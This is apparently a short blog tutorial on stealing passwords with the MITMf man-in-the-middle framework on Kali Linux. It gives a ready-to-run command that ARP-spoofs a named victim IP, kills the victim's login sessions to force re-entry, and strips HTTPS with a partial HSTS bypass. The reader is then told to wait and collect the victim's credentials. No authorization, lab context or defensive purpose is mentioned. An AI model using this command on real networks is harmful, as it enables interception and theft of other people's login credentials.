MITMF-1: Sniffing Passwords Using Man in the Middle Framework

Hello Friends!!This is my first article for a Man-In-The-Middle Attack series.In this article, we'll see how to sniff passwords using a MITMF framework. I use a framework tool for Man-In-The-Middle attacks and you can read more about it here. So, let's get started...1. It's good habit to first read the Man Page or Help Page about any tool or command. To see the MITMF frameworks man page, type in MITMF command without any arguments: mitmf2. After you've gone through all the options available under mitmf framework, lets do some real hacking. Open your Kali Linux terminal and type this command:

mitmf -i wlan0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k --hsts

command explanation:

--i: Is used to define the network interface. In the case above, it's wlan0.

--gateway: Is used to define the router's address In the above command, it's 192.168.0.1

--spoof: Loads plugin Spoof.

--arp: Redirects traffic using ARP spoofing.

--target: Is the victims IP address. In the above command, it's 192.168.0.4

--k: Kills the current login sessions and forces victim to re-login.

--hsts: Enables SSLstrip+ for partial HSTS bypass.

 3. Wait for user to login with their credentials and you'll get their credentials. That's it. Thank you everyone for reading this article. There's lot more interesting stuff coming in the next articles, because MITMF has endless capabilities. :)Please comment if I've made any mistakes and if you'd like to suggest something.Thank you.